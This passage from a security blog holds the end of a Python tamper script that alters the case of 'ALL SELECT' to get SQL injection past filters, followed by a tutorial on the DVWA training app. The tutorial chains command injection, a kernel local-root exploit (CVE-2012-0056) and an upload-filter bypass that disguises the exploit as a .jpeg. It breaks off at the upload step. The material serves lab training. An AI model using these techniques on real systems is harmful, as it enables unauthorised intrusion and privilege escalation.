</span><span class="str" style="color: #008800;"><br />""" INPUT : UNION ALL SELECT OUTPUT : UNION ALL SELEcT TESTED AGAINST: mysql 5.x.x """</span><span class="str" style="color: #008800;"> </span></span><br />
<span style="font-family: Verdana, sans-serif;"><span class="str" style="color: #008800;">INPUT : UNION ALL SELECT</span><span class="str" style="color: #008800;"> </span></span><br />
<span style="font-family: Verdana, sans-serif;"><span class="str" style="color: #008800;">OUTPUT : UNION ALL SELECT</span></span><br />
<span style="font-family: Verdana, sans-serif;"><span class="str" style="color: #008800;">TESTED AGAINST: mysql 5.x.x</span><span class="str" style="color: #008800;"> </span></span><br />
<span style="font-family: Verdana, sans-serif;"><span class="str" style="color: #008800;">"""</span><span class="pln" style="color: black;"> </span></span><br />
<span style="font-family: Verdana, sans-serif;"><span class="pln" style="color: black;"></span><span class="kwd" style="color: #000088;">if</span><span class="pln"> <span style="color: #f3f3f3;">payload</span></span><span class="pun"><span style="color: #f3f3f3;">:</span></span><span style="color: #f3f3f3;"><span class="pln"> </span></span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><span class="pln"> retVal</span><span class="pun">=</span></span><span class="str" style="color: #008800;">""</span><span class="pln" style="color: black;"> i</span><span class="pun" style="color: #666600;">=</span><span class="lit" style="color: #006666;">0</span><span class="pln" style="color: black;"> </span><span class="pln" style="color: black;"></span><span class="kwd" style="color: #000088;">for</span><span class="pln" style="color: black;"> i </span><span class="kwd" style="color: #000088;">in</span><span class="pln"> <span style="color: #f3f3f3;">xrange</span></span><span style="color: #f3f3f3;"><span class="pun">(</span><span class="pln">len</span><span class="pun">(</span><span class="pln">payload</span></span><span class="pun"><span style="color: #f3f3f3;">)):</span></span><span class="pln" style="color: black;"> </span></span><br />
<span style="font-family: Verdana, sans-serif;"><span class="pln" style="color: black;"></span><span class="kwd" style="color: #000088;">if</span><span class="pln"> <span style="color: #f3f3f3;">payload</span></span><span style="color: #f3f3f3;"><span class="pun">[</span><span class="pln">i</span><span class="pun">:</span></span><span class="pln"><span style="color: #f3f3f3;">i</span></span><span class="pun" style="color: #666600;">+</span><span class="lit" style="color: #006666;">10</span><span class="pun" style="color: #666600;">]</span><span class="pln" style="color: black;"> </span><span class="pun" style="color: #666600;">==</span><span class="pln" style="color: black;"> </span><span class="str" style="color: #008800;">"ALL SELECT"</span><span class="pun" style="color: #666600;">:</span><span class="pln"><span style="color: #f3f3f3;"> </span></span></span><br />
<span style="font-family: Verdana, sans-serif;"><span class="pln"><span style="color: #f3f3f3;"> retVal </span></span><span class="pun"><span style="color: #f3f3f3;">+=</span></span><span class="str" style="color: #008800;">"ALL SELEcT"</span><span class="pln" style="color: black;"> </span><span class="pun" style="color: #666600;">+</span><span class="pln" style="color: black;"> </span><span style="color: #f3f3f3;"><span class="pln">payload</span><span class="pun">[</span><span class="pln">i</span><span class="pun">+</span></span><span class="lit" style="color: #006666;">10</span><span class="pun" style="color: #666600;">:</span><span class="pun"><span style="color: #f3f3f3;">]</span></span><span class="pln" style="color: black;"> </span></span><br />
<span style="font-family: Verdana, sans-serif;"><span class="pln" style="color: black;"></span><span class="kwd" style="color: #000088;">break</span><span class="pln" style="color: black;"> </span></span><br />
<span style="font-family: Verdana, sans-serif;"><span class="pln" style="color: black;"></span><span class="kwd" style="color: #000088;">else</span><span class="pun" style="color: #666600;">:</span><span style="color: #f3f3f3;"><span class="pln"> retval </span><span class="pun">+=</span><span class="pln"> payload</span><span class="pun">[</span><span class="pln">i</span></span><span class="pun"><span style="color: #f3f3f3;">]</span></span><span class="pln" style="color: black;"> </span></span><br />
<span style="font-family: Verdana, sans-serif;"><span class="kwd" style="color: #000088;">return</span><span class="pln" style="color: black;"> </span><span class="pln"><span style="color: #f3f3f3;">retVal</span></span></span><br />
<span style="font-family: Verdana, sans-serif;"><span class="pln"><span style="color: #f3f3f3;"><br /></span></span></span>
<span style="font-family: Verdana, sans-serif;"><span class="pln"><span style="color: #f3f3f3;"><br /></span></span></span>
<span style="font-family: Verdana, sans-serif;"><span class="pln"><span style="color: #f3f3f3;"><br /></span></span></span></div>
</div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com1tag:blogger.com,1999:blog-5858162330672279498.post-707132473532740572014-04-03T20:00:00.000-04:002014-04-03T20:09:41.102-04:00Advanced Web Penetration<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<div style="text-align: center;">
<div style="text-align: center;">
<span style="color: #9fc5e8;"><span style="font-family: Georgia Serif;"> </span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;">Web Application Hacking</span></span></div>
<div class="post-header-line-1" style="font-family: 'Georgia Serif'; font-size: small; text-align: left;">
</div>
<div class="post-body entry-content" style="line-height: 1.6em; margin: 0px 0px 0.75em; text-align: left;">
<div style="font-family: Verdana, sans-serif; font-size: 14px; text-align: justify;">
<span style="line-height: 1.6em;"><br /></span></div>
<div style="text-align: justify;">
</div>
<div style="text-align: center;">
</div>
<div style="text-align: left;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 1.6em;">In this post, I'll try to show how to gain a root access through a web application. There are a lot of method to do that, this is one of them. The web application that will be used is DVWA(Damn Vulnerable Web Application). You can download it</span><span style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 1.6em;"> </span><a href="http://www.dvwa.co.uk/" style="font-family: Verdana, sans-serif; line-height: 1.6em; text-decoration: none;" target="_blank">here</a><span style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 1.6em;">. The installation is there too.</span></div>
<span style="color: #f3f3f3;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Start up your apache and mysql.</span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRoIWOiIpZJzl-mmKxwf1HHFlwbmeOuqVmvp_VrjRWxKVWke-fupfOTkEb7aoj7_Vj_XHkOhJnZJJ73JEGK1rPmReiS10RtpxqcjN8xdy7Nsgc6woE5A8KMnSie7mtG4VWT-ZkVFwsRow/s1600/root@bt:+~_002.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRoIWOiIpZJzl-mmKxwf1HHFlwbmeOuqVmvp_VrjRWxKVWke-fupfOTkEb7aoj7_Vj_XHkOhJnZJJ73JEGK1rPmReiS10RtpxqcjN8xdy7Nsgc6woE5A8KMnSie7mtG4VWT-ZkVFwsRow/s400/root@bt:+~_002.png" style="border-width: 0px;" width="400" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Open dvwa in browser.</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihpN7nS5teCchwHEffzvbeDjKZ5Cz7foWNQ1cSr9uZlqFwJSd15jVw4LAVRIJjZR7iPuLDxO0JuAJ6EHiGwrFqp20-7SeBMScLm4wvL1usFtdAHN7Kap8ydrytT8sph0-IgK0kI7TT6j8/s1600/Damn+Vulnerable+Web+App+%28DVWA%29+-+Login+-+Mozilla+Firefox_003.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihpN7nS5teCchwHEffzvbeDjKZ5Cz7foWNQ1cSr9uZlqFwJSd15jVw4LAVRIJjZR7iPuLDxO0JuAJ6EHiGwrFqp20-7SeBMScLm4wvL1usFtdAHN7Kap8ydrytT8sph0-IgK0kI7TT6j8/s400/Damn+Vulnerable+Web+App+%28DVWA%29+-+Login+-+Mozilla+Firefox_003.png" style="border-width: 0px;" width="400" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Login with username : admin and password : password.</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvgNAW4IoWt-lbYXeWzkumrCj19H4gdxKBX1l_xAitESX33XTTwtDse6d8VT8JAebHmCyWZsdfjz9EyZCy10tUBs7Cgd83FN5Sr4tshps19SZMws8MtTBM73KFqSNS3yXyA8bv7cp_8Bs/s1600/Selection_004.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="259" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvgNAW4IoWt-lbYXeWzkumrCj19H4gdxKBX1l_xAitESX33XTTwtDse6d8VT8JAebHmCyWZsdfjz9EyZCy10tUBs7Cgd83FN5Sr4tshps19SZMws8MtTBM73KFqSNS3yXyA8bv7cp_8Bs/s320/Selection_004.png" style="border-width: 0px;" width="320" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- DVWA main page.</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaA-9RZHZoMbAyWAsFzGv7ZbLEO08jo_F8yYZhM3SMXvyhfOWjXfgWp2s_R8N-H_X7EbrNsHjJdUunBopRlLNUR9irzpeygqoc1PZHAWu6-oDrG4dHDv8HNEiPLMFPc7OLnhd2tSuXX-4/s1600/Damn+Vulnerable+Web+App+%28DVWA%29+v1.0.7+::+Welcome+-+Mozilla+Firefox_005.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaA-9RZHZoMbAyWAsFzGv7ZbLEO08jo_F8yYZhM3SMXvyhfOWjXfgWp2s_R8N-H_X7EbrNsHjJdUunBopRlLNUR9irzpeygqoc1PZHAWu6-oDrG4dHDv8HNEiPLMFPc7OLnhd2tSuXX-4/s320/Damn+Vulnerable+Web+App+%28DVWA%29+v1.0.7+::+Welcome+-+Mozilla+Firefox_005.png" style="border-width: 0px;" width="320" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- The vulnerability that I'll use to gain root access from this web is through its "command execution" vulnerability because in a web, this is the most dangerous feature to have. Hacker can get a shell without having to place a backdoor inside the server.</span></div>
</span><span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Set the security level to medium. (because 'low' would be too easy and 'hard' would be too difficult.. :P )</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDsyC1euFfOj3J2U389YUzjS1hGl2tmTZpa6YJlMHmswQdVnB1j4e8D1ApigXrwKjmkIiAbQeGuRF0JMgYnHkCep0Jj4EGiwiTtgmc9faIiv6b9gR3ZRCDaQKZYF8hWMBbggQCEi4CoR0/s1600/Selection_006.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDsyC1euFfOj3J2U389YUzjS1hGl2tmTZpa6YJlMHmswQdVnB1j4e8D1ApigXrwKjmkIiAbQeGuRF0JMgYnHkCep0Jj4EGiwiTtgmc9faIiv6b9gR3ZRCDaQKZYF8hWMBbggQCEi4CoR0/s320/Selection_006.png" style="border-width: 0px;" width="320" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Lets try to do a normal command.</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcfSu8HrIqCb4kQnRZ1j6-oKDNQ661SHpBY2tGE8XkPgNvkRoOUmnZ1By_O7xCZMBMiOgKaMsggP8z9zl-f_yQtMi-5hbQpmvhxO3pkedhQx5tZ6klX8vEAyO74HcvRZPgqzzr-LYIS30/s1600/Selection_007.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcfSu8HrIqCb4kQnRZ1j6-oKDNQ661SHpBY2tGE8XkPgNvkRoOUmnZ1By_O7xCZMBMiOgKaMsggP8z9zl-f_yQtMi-5hbQpmvhxO3pkedhQx5tZ6klX8vEAyO74HcvRZPgqzzr-LYIS30/s400/Selection_007.png" style="border-width: 0px;" width="400" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdSF8onSaTt3KRIjeQ6EUJ8UyNDWGYB8Myoxyw0WDLKYikkuMyHPK6g4Pe_G5VBlbCrakEEPMNxB8YoDs-77vY1xesGGhA_PpoYGXHp0DQR_WrPRFD-H-fthiPJa1eFUeIn7jXuCZrpQg/s1600/Selection_008.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="157" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdSF8onSaTt3KRIjeQ6EUJ8UyNDWGYB8Myoxyw0WDLKYikkuMyHPK6g4Pe_G5VBlbCrakEEPMNxB8YoDs-77vY1xesGGhA_PpoYGXHp0DQR_WrPRFD-H-fthiPJa1eFUeIn7jXuCZrpQg/s400/Selection_008.png" style="border-width: 0px;" width="400" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Next, lets execute multiple command.</span></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;"><br /></span></div>
</span></span><span style="color: #f3f3f3;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVbK5np00II-FjiawwKnBkIR0jJZV0_xBPMpBovyANm3q-eBQNPk4zzHfMcBI-MW9b6R0WRq6uA8isKL1PJRWKhumw5WuMg4XF6_KNCZlTY0Li2fQZ65zgTYoS8-QDx7z_oZgdV3M8azU/s1600/Selection_009.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVbK5np00II-FjiawwKnBkIR0jJZV0_xBPMpBovyANm3q-eBQNPk4zzHfMcBI-MW9b6R0WRq6uA8isKL1PJRWKhumw5WuMg4XF6_KNCZlTY0Li2fQZ65zgTYoS8-QDx7z_oZgdV3M8azU/s400/Selection_009.png" style="border-width: 0px;" width="400" /></a></span></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Lets try to use pipe "|". </span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2qa1BA9h25SYS2KfOXyjEH3yNGXQzsGvbOHENSBacec9Qa1-eWoEJlz0JmYdNFcRo-fSYfNouxgJ6BZ1sgQAOyTl-kCPtce1_-FTGu7juj6DqHrGSLxUTeTgUnb2UkXcv-L1p-m31jjs/s1600/Selection_010.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="93" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2qa1BA9h25SYS2KfOXyjEH3yNGXQzsGvbOHENSBacec9Qa1-eWoEJlz0JmYdNFcRo-fSYfNouxgJ6BZ1sgQAOyTl-kCPtce1_-FTGu7juj6DqHrGSLxUTeTgUnb2UkXcv-L1p-m31jjs/s400/Selection_010.png" style="border-width: 0px;" width="400" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Looking good. Now, lets begin the attack. >:)</span></div>
</span><span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- I'll use a local exploit on the system to gain the root access. Before searching the exploit, lets see what version of kernel the system running.</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyIPp1zDYZXNc7QprK4FWMhng2nPDtqfyXgHB3wBcRTxH9W7ZJ_t9qRbO6rPT5WUjBKvfclRGepSur8QOE15IG2wVuUTOpfEVZxrQIsyu0ssR6vhSlXqyVLzlQnvP65iJdumEP-VSlnnI/s1600/Selection_011.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="93" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyIPp1zDYZXNc7QprK4FWMhng2nPDtqfyXgHB3wBcRTxH9W7ZJ_t9qRbO6rPT5WUjBKvfclRGepSur8QOE15IG2wVuUTOpfEVZxrQIsyu0ssR6vhSlXqyVLzlQnvP65iJdumEP-VSlnnI/s400/Selection_011.png" style="border-width: 0px;" width="400" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Search the exploitdb for the local exploit. Using keyword "2.6.39" I found this exploit created by zx2c4 coded in C language.</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxLOBeTShMWKr5sQuODhjQLu6jBcw32whLMUa5jXuRF0p1S6S0Ai-oIzxi7xclr9_2zjddQgh9dtGXBZWJE2eLEHI5OucDaOt9-yNvRpQlStHajgbluw5ayCS_9m7DVjzaRwU0WXhD-cg/s1600/Selection_012.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxLOBeTShMWKr5sQuODhjQLu6jBcw32whLMUa5jXuRF0p1S6S0Ai-oIzxi7xclr9_2zjddQgh9dtGXBZWJE2eLEHI5OucDaOt9-yNvRpQlStHajgbluw5ayCS_9m7DVjzaRwU0WXhD-cg/s640/Selection_012.png" style="border-width: 0px;" width="640" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="font-family: Verdana, sans-serif;"><div style="text-align: left;">
<span style="line-height: 1.6em;">- After download the exploit, lets compile it first before transferring it to the target. Original Exploit code</span><span style="line-height: 1.6em;"> </span><a href="http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c" style="line-height: 1.6em; text-decoration: none;" target="_blank">here</a><span style="line-height: 1.6em;">.</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrL_6sh4l9tbdf1c0-sn5zC31AWZrxianr1rQ8DqnWLHVjyZjHICKFN6kZ_RpWz25Ar84DjfeSLvFJica4ifNJ3uHKdYW9KrIkzsp1d5zNUxA21zPHOlr9vz8vhCb9ibAUDVdamEVg68s/s1600/root@bt:+-var-www-files_013.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrL_6sh4l9tbdf1c0-sn5zC31AWZrxianr1rQ8DqnWLHVjyZjHICKFN6kZ_RpWz25Ar84DjfeSLvFJica4ifNJ3uHKdYW9KrIkzsp1d5zNUxA21zPHOlr9vz8vhCb9ibAUDVdamEVg68s/s400/root@bt:+-var-www-files_013.png" style="border-width: 0px;" width="400" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Exploit ready to be used.</span></div>
</span><span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Now lets try to upload it using "File Upload" on dvwa. Before doing that, I'll increase dvwa security into High level because it is a rule in my training center.</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJT3f4zK5RlpGLWbkuRQclnCEBJZrRBGg8tS703I9f2zSqfKllszQloUvpH3LgR7ipah_tUFTCA8G-lCVQUSebKEEGCKsUtoArrgCPS6OWvtcdJHvzdpXuA6Gg2XsUDdIEFsj4BNV5hok/s1600/Selection_015.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJT3f4zK5RlpGLWbkuRQclnCEBJZrRBGg8tS703I9f2zSqfKllszQloUvpH3LgR7ipah_tUFTCA8G-lCVQUSebKEEGCKsUtoArrgCPS6OWvtcdJHvzdpXuA6Gg2XsUDdIEFsj4BNV5hok/s320/Selection_015.png" style="border-width: 0px;" width="320" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Ok, lets try to upload the exploit.</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja2qFakmWbHoAWlrIOg1Z6gqJBNE0Ts7q4n8AVyO0rdm3Jjyk7rW9HAuRJCG9vzpQWgGjMirHEVfxlij0PX69YE9mxW9zlQpJG9LOaxZ2mOmNyO918HYIejliqWTZmzaHTEDHdUN-mEco/s1600/Selection_016.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="131" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja2qFakmWbHoAWlrIOg1Z6gqJBNE0Ts7q4n8AVyO0rdm3Jjyk7rW9HAuRJCG9vzpQWgGjMirHEVfxlij0PX69YE9mxW9zlQpJG9LOaxZ2mOmNyO918HYIejliqWTZmzaHTEDHdUN-mEco/s320/Selection_016.png" style="border-width: 0px;" width="320" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglxEql9qOm3a5tJYEcbu6bNSmdHemjL50W7-nLVEdQrru5SAvknBsiK4ygxR07aeQlQ675IVJ0eGYmdpBDf6ELCo6JaMRYjBTwxmPcAOaYO0fz_g8pDsjD0yDgb67zFwGOP61Yxia0w3g/s1600/Selection_017.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglxEql9qOm3a5tJYEcbu6bNSmdHemjL50W7-nLVEdQrru5SAvknBsiK4ygxR07aeQlQ675IVJ0eGYmdpBDf6ELCo6JaMRYjBTwxmPcAOaYO0fz_g8pDsjD0yDgb67zFwGOP61Yxia0w3g/s1600/Selection_017.png" style="border-width: 0px;" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Whoops, it looks like the server only accept image file to be uploaded.</span></div>
</span><span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Lets try to add image extention into the exploit. I'll make it into exploit.jpeg</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguqMjbU5Rn14D-0emErEDg2AvxCp0KRtUFL2KHuk9AKSCgE30Tz5R5IKuIOWa3eLfTfw5mafSIz-eVw_wswHr_BnTV_MmN8XDaIZtjrMdfzMeAFl7kIqbDLZCC7rE7427iq3vGC-eaGlU/s1600/root@bt:+-var-www-files_019.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguqMjbU5Rn14D-0emErEDg2AvxCp0KRtUFL2KHuk9AKSCgE30Tz5R5IKuIOWa3eLfTfw5mafSIz-eVw_wswHr_BnTV_MmN8XDaIZtjrMdfzMeAFl7kIqbDLZCC7rE7427iq3vGC-eaGlU/s320/root@bt:+-var-www-files_019.png" style="border-width: 0px;" width="320" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Upload it.</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
